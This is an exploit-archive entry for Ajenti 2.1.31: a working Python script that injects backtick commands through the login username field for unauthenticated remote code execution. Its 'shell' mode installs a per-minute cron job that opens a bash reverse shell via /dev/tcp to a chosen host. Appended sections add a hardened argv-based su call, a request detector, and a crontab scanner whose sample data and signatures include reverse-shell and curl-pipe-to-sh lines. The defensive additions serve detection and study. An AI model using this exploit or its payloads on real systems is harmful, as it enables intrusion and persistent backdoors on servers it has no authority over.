Title: "Ajenti 2.1.31 - Remote Code Execution"

Author: Jeremy Brown

Platform: python

Release date: 2019-10-14

# Title: Ajenti 2.1.31 - Remote Code Execution
# Author: Jeremy Brown
# Date: 2019-10-13
# Software Link: https://github.com/ajenti/ajenti
# CVE: N/A
# Tested on: Ubuntu Linux

#!/usr/bin/env python3
# ajentix.py (uses urllib.request, so it needs Python 3; run as python3 ajentix.py)
# 
# Ajenti Remote Command Execution Exploit
#
# -------
# Details
# -------
#
# Ajenti is a web control panel written in Python and AngularJS. 
#
# One can locally monitor executed commands on the server while testing
#
# $ sudo ./exec-notify (google for "exec-notify.c", modify output as needed)
# sending proc connector: PROC_CN_MCAST_LISTEN... sent
# Reading process events from proc connector.
# Hit Ctrl-C to exit
#
# Browse over to https://server:8000/view/login/normal to login
#
# .....
# pid=9889 executed [/bin/sh -c /bin/su -c "/bin/echo SUCCESS" - test ]
# pid=9889 executed [/bin/su -c /bin/echo SUCCESS - test ]
#
# Modified the JSON request username value to be `id`
#
# pid=7514 executed [/bin/sh -c /bin/su -c "/bin/echo SUCCESS" - `id` ]
# pid=7516 executed [id ]
# pid=7514 executed [/bin/su -c /bin/echo SUCCESS - uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup) ]
#
# *ACK.....*
#
# The username from the login request is spliced unescaped into a shell
# command line, so backtick command substitution runs as the panel's user
# (nobody here) before su ever sees the name. No credentials are needed.
#
# Also the login routine times out after 5 seconds (see auth.py), which
# makes an interactive shell relatively ephemeral. So instead of a one-shot
# shell we install a cron job that reconnects every minute.
#
# $ python3 ajentix.py server.ip shell local-listener.ip
# Done!
#
# $ nc -v -l -p 5555
# Listening on [0.0.0.0] (family 0, port 5555)
# Connection from server.domain 41792 received!
# bash: cannot set terminal process group (18628): Inappropriate ioctl for device
# bash: no job control in this shell
# nobody@server:/var/spool/cron$ ps
#   PID TTY          TIME CMD
#  6386 ?        00:00:00 /usr/local/bin/ <-- ajenti-panel worker
# 18849 ?        00:00:00 sh
# 18851 ?        00:00:00 bash
# 18859 ?        00:00:00 ps
#
#
# Tested Ajenti 2.1.31 on Ubuntu 18.04, fixed in 2.1.32
# 
# Fix commit: https://github.com/ajenti/ajenti/commit/7aa146b724e0e20cfee2c71ca78fafbf53a8767c
#
#

import sys
import ssl
import json
import urllib.request as request

def main():
    # argv[2] is always read below, so require host and cmd (usage was checking for < 2)
    if len(sys.argv) < 3:
        print("Usage: %s <host> [\"cmd\" or shell...ip]\n" % sys.argv[0])
        print("Eg:    %s 1.2.3.4 \"id\"" % sys.argv[0])
        print("...    %s 1.2.3.4 shell 5.6.7.8\n" % sys.argv[0])
        return

    host = sys.argv[1]
    cmd = sys.argv[2]

    if cmd == 'shell':
        if len(sys.argv) < 4:
            print("Error: need ip to connect back to for shell")
            return

        ip = sys.argv[3]

        # Write a per-minute crontab entry for the panel's user that spawns a bash
        # reverse shell to <ip>:5555; cron keeps respawning it after the 5 s auth timeout
        shell = "`echo \"* * * * * bash -i >& /dev/tcp/" + ip + "/5555 0>&1\" > /tmp/cronx; crontab /tmp/cronx`"
        username = shell

    else:
        # Backticks are expanded by /bin/sh when the panel builds its su command line
        username = "`" + cmd + "`"

    # The "username" field of the login request is what reaches the shell
    body = json.dumps({'username': username, 'password': 'test', 'mode': 'normal'})
    byte = body.encode('utf-8')

    url = "https://" + host + ":8000" + "/api/core/auth"

    try:
        req = request.Request(url)

        req.add_header('Content-Type', 'application/json; charset=utf-8')
        req.add_header('Content-Length', len(byte))

        # ignore the cert (control panels commonly run with a self-signed one)
        request.urlopen(req, byte, context=ssl._create_unverified_context())

    except Exception as error:
        # the 5 s server-side timeout usually surfaces here as an HTTP error; the
        # injected command has still run by then
        print("Error: %s" % error)
        return

    print("Done!")


if __name__ == '__main__':
    main()
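The root cause above is a username interpolated into a shell string. The following is an added illustration, not Ajenti's source or the fix commit: a constructed template reproducing the command shape exec-notify showed (`/bin/su -c "/bin/echo SUCCESS" - <username>`), a hardened builder that validates the account name and passes it as a single argv element with `shell=False` and a timeout, and a request-side check that flags an `/api/core/auth` body whose username could not be a Unix account name. `run_su_check` is hypothetical (it needs `/bin/su` and a password source) and is shown only for the call shape; the allow-list regex is an assumption modelled on `useradd`'s default name pattern.

```python
import json
import re
import subprocess

# Constructed template matching the command line exec-notify showed above:
# the username is spliced into a string that /bin/sh -c then parses.
# Illustration of the pattern only, not Ajenti's own source.
VULNERABLE_TEMPLATE = '/bin/su -c "/bin/echo SUCCESS" - %s'


def vulnerable_command(username):
    """String the vulnerable pattern hands to /bin/sh -c; backticks, $( ), ; all survive."""
    return VULNERABLE_TEMPLATE % username


# Assumed allow-list for Unix account names (shape of useradd's default NAME_REGEX):
# lowercase letter or underscore first, then [a-z0-9_-], optional trailing '$'.
USERNAME_RE = re.compile(r'[a-z_][a-z0-9_-]{0,31}\$?')


def is_valid_username(username):
    return isinstance(username, str) and USERNAME_RE.fullmatch(username) is not None


def hardened_command(username):
    """argv list for subprocess with shell=False: the name is one argument and is never
    re-parsed by a shell. Validation also rejects option-looking names such as '-l'."""
    if not is_valid_username(username):
        raise ValueError('unexpected username')
    return ['/bin/su', '-c', '/bin/echo SUCCESS', '-', username]


def run_su_check(username, timeout=5.0):
    """Hypothetical replacement for the login check's subprocess call (not run here:
    it needs /bin/su and a password source). Note the timeout, no shell, no stdin."""
    try:
        result = subprocess.run(hardened_command(username), stdin=subprocess.DEVNULL,
                                capture_output=True, timeout=timeout)
    except (ValueError, subprocess.TimeoutExpired):
        return False
    return result.returncode == 0 and b'SUCCESS' in result.stdout


def suspicious_auth_request(body):
    """Detection side: flag an /api/core/auth body whose username cannot be an account name."""
    try:
        data = json.loads(body)
    except ValueError:
        return True
    if not isinstance(data, dict):
        return True
    return not is_valid_username(data.get('username'))


if __name__ == '__main__':
    payload = '`id`'   # the exploit's first-mode username
    print('vulnerable:', vulnerable_command(payload))
    print('hardened  :', hardened_command('test'))
    body = json.dumps({'username': payload, 'password': 'test', 'mode': 'normal'})
    print('suspicious:', suspicious_auth_request(body))
```

The argv form alone stops metacharacter interpretation; the allow-list additionally stops a name like `-l` from being read by `su` as an option, which an argv list by itself would not prevent.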
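Because the 5-second auth timeout pushed the author to persistence via cron, the artifact an incident responder will find is a crontab owned by the panel's service account in /var/spool/cron. The scanner below is an added example (not part of the exploit or of Ajenti): it parses a constructed crontab sample containing the exploit's reverse-shell entry, matches each command against a few reverse-shell and download-and-run signatures, and separately flags an every-minute job owned by a service account. The sample lines and the 203.0.113.7 address are constructed test data.

```python
import re

# Constructed sample of /var/spool/cron/crontabs/nobody after the exploit's
# "shell" mode ran, with benign entries and one other suspicious one mixed in.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
* * * * * bash -i >& /dev/tcp/203.0.113.7/5555 0>&1
*/5 * * * * curl -s http://203.0.113.7/x.sh | sh
@reboot /usr/local/bin/backup.sh
"""

# Signatures for common reverse-shell / download-and-run one-liners.
SIGNATURES = [
    (re.compile(r'/dev/tcp/'), 'bash /dev/tcp reverse shell'),
    (re.compile(r'\bbash\s+-i\b'), 'interactive bash spawned from cron'),
    (re.compile(r'\b(?:nc|ncat|netcat)\b.*\s-e\s'), 'netcat with -e'),
    (re.compile(r'\b(?:curl|wget)\b.*\|\s*(?:ba)?sh\b'), 'download piped to a shell'),
]

# Accounts that should not own a crontab on a typical server.
SERVICE_ACCOUNTS = ('nobody', 'www-data')


def parse_crontab(text):
    """Yield (lineno, schedule, command) for non-comment, non-empty crontab lines."""
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith('#'):
            continue
        if stripped.startswith('@'):            # @reboot, @daily, ...
            parts = stripped.split(None, 1)
            yield lineno, parts[0], parts[1] if len(parts) > 1 else ''
            continue
        parts = stripped.split(None, 5)         # five time fields, then the command
        if len(parts) < 6:
            continue                            # malformed; cron would reject it too
        yield lineno, ' '.join(parts[:5]), parts[5]


def scan_crontab(text, owner):
    """Return [(lineno, reason)] for entries that look like persistence."""
    findings = []
    for lineno, schedule, command in parse_crontab(text):
        reasons = [why for rx, why in SIGNATURES if rx.search(command)]
        # an every-minute job under a service account is the classic reconnect loop
        if owner in SERVICE_ACCOUNTS and schedule == '* * * * *':
            reasons.append('every-minute job owned by service account %s' % owner)
        findings.extend((lineno, why) for why in reasons)
    return findings


if __name__ == '__main__':
    for lineno, why in scan_crontab(SAMPLE_CRONTAB, 'nobody'):
        print('line %d: %s' % (lineno, why))
```

On a live host, feed it each file under /var/spool/cron (or the output of `crontab -l -u <user>`) with the owner taken from the filename; the owner check is what distinguishes the exploit's entry from an admin's own minutely job.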